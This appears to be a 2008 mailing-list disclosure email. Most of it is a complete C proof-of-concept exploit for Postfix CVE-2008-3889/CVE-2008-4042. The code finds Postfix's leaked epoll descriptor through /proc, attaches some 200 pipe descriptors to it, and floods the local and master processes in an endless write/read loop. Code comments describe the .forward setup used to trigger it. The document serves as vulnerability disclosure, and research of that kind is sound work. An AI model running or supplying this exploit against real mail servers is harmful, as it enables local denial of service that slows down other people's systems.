Hello, I have released this PoC for the Linux-only local denial of service caused by the leak of epoll file descriptors. This Proof of concept creates a pipe and adds it in postfix's epoll file descriptor. When the pipe is added, an endless loop will launch lots of events to the local and master postfix processes. This PoC will slowdown the system a lot. You can find all the needed files at http://www.wekk.net/research/CVE-2008-4042/ and http://www.wekk.net/research/CVE-2008-3889/ and attached with this email. Feel free to write me for feedback, corrections, etc. -- Albert Sellarès GPG id: 0x13053FFE http://www.wekk.net whats_up@xxxxxxxxxx Linux User: 324456 Catalunya
/* * http://www.wekk.net/research/CVE-2008-4042/CVE-2008-4042-exploit.c * http://www.wekk.net/research/CVE-2008-3889/CVE-2008-3889-exploit.c * * Exploit for Postfix 2.4 before 2.4.9, 2.5 before 2.5.5, and 2.6 * before 2.6-20080902, when used with the Linux 2.6 kernel. * * CVE-2008-3889 & CVE-2008-4042 * * by Albert Sellarès <whats[at]wekk[dot]net> - http://www.wekk.net * and Marc Morata Fité <marc.morata.fite[at]gmail[dot]com> * 2008-09-16 * * This Proof of concept creates a pipe, and adds it in the postfix's epoll * file descriptor. * When the pipe is added, a endless loop will launch lots of events to the * local and master postfix processes. * This will slowdown de system a lot. * * An example of use: * 1- Put the content "| ~/CVE-2008-3889-exploit >> /tmp/postfix.log &" (with * the double quotes) * in the file ~/.forward * * 2- Put the CVE-2008-4042-exploit in your home * gcc CVE-2008-3889-exploit.c -o CVE-2008-3889-exploit * * 3- Send and email to the user * * You can see the output at /tmp/postfix.log */ #include <sys/epoll.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdio.h> #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> #include <dirent.h> #include <errno.h> #define FDOPEN 200 void add_fd(int fde, int fd) { printf("[*] Adding fd %d to eventpoll %d\n", fd, fde); static struct epoll_event ev; ev.events = EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP|EPOLLET; errno =0; // If this is a socket fd, the load is high ev.data.u32 = 6; ev.data.u64 = 6; if (epoll_ctl(fde, EPOLL_CTL_ADD, fd, &ev) == 0) { printf(" => Fd %d added!\n", fd); } else { printf(" => Error (%d) adding fd %d\n", errno, fd); } } int main(int argc, char *argv[]) { int fds[2]; char dir[32], c; int i, found = 0; pipe(fds); sprintf(dir, "/proc/%d/fd", getpid()); printf("[*] Opening directory %s\n", dir); DIR *fd_dir = opendir(dir); struct dirent *de = readdir(fd_dir); // We are looking for the eventpoll file descriptor while (de != NULL) { char link_d[256]; char link_f[256]; memset(link_d, 0, 256); sprintf(link_f, "%s/%s", dir, de->d_name); readlink(link_f, link_d, 256); if ( strstr(link_d, "eventpoll") ) { found = 1; printf(" => %s points to %s\n", de->d_name, link_d); add_fd(atoi(de->d_name), fds[0]); // We can test with more than one triggered event at once for (i = 0; i<FDOPEN; i++) add_fd(atoi(de->d_name),dup(fds[0])); } de = readdir(fd_dir); } closedir(fd_dir); if (found == 0) { printf("[!] Are you sure that your postfix is vulnerable?\n"); printf("[!] Are you launching me throw a .forward file?\n"); exit(0); } printf("[*] Starting to flood the system!\n"); fflush(stdout); close(0); close(1); close(2); // This triggers the events while (1) { write(fds[1], "A",1); read(fds[0],&c, 1); } return 0; }
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